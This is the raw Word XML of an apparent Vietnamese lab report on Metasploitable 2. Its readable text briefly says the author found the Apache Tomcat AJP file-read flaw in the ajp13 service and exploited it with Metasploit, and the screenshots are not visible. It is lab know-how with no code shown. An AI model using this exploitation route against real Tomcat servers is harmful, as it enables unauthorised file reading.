                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2217420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C23F9E3" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5"/>
    <w:p w14:paraId="00D43663" w14:textId="59F57C80" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện khai thác</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ajp13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D797DFB" w14:textId="1EA40176" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D8D437" wp14:editId="5D51F09F">
            <wp:extent cx="5630061" cy="381053"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="20632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9555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5630061" cy="381053"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A7B88" w14:textId="55CD1563" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Tìm kiếm trên gg và phát hiện lỗ hổng đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:t>ọc tệp AJP của Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2F8C1" w14:textId="20597CFE" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241CE58E" wp14:editId="35575788">
            <wp:extent cx="5731510" cy="1105535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7565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198" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1105535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05979406" w14:textId="05CDC003" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Chạy mã khai thác trên metasploit và đọc được tệp ajp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B08C8" w14:textId="7189BC90" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C13CA43" wp14:editId="10F9CEBC">
            <wp:extent cx="5731510" cy="4126865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1031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719" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4126865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B1B31" w14:textId="5A8FEB48" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D197D5" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0245334E" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC8E397" w14:textId="646498C2" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C030A30" w14:textId="481E45FF" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00924CA5" w:rsidRPr="00924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A8"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="0003205D"/>
    <w:rsid w:val="000A6408"/>
    <w:rsid w:val="000A6EE7"/>
    <w:rsid w:val="001F037B"/>
    <w:rsid w:val="002279AB"/>
    <w:rsid w:val="0024232A"/>
    <w:rsid w:val="002A1C57"/>
    <w:rsid w:val="0031357D"/>
    <w:rsid w:val="003C20E1"/>
    <w:rsid w:val="0056777F"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="00622562"/>
    <w:rsid w:val="00672E75"/>
    <w:rsid w:val="006940F7"/>
    <w:rsid w:val="0072242F"/>
    <w:rsid w:val="00723D26"/>
    <w:rsid w:val="00790630"/>
    <w:rsid w:val="00865618"/>
    <w:rsid w:val="00872E89"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008F7E43"/>
    <w:rsid w:val="00924CA5"/>
    <w:rsid w:val="00987CB4"/>
    <w:rsid w:val="00996999"/>
    <w:rsid w:val="00A64A86"/>
    <w:rsid w:val="00C443E2"/>
    <w:rsid w:val="00E70974"/>
    <w:rsid w:val="00EE22A8"/>
    <w:rsid w:val="00FA08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8081"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C7BC4DF-0588-4915-AAA4-A2D71E7F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A8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002A1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2A8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE22A8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="002A1C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5608">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="288825602">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1164279091">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="17183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hyperlink" Target="https://community.rapid7.com/community/metasploit/blog/2012/06/12/introducing-metasploitable-2" TargetMode="Externa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39F1-4736-4579-B121-4C0BBFD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9</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 ryuki</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>build ryuki</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-22T08:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-23T16:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>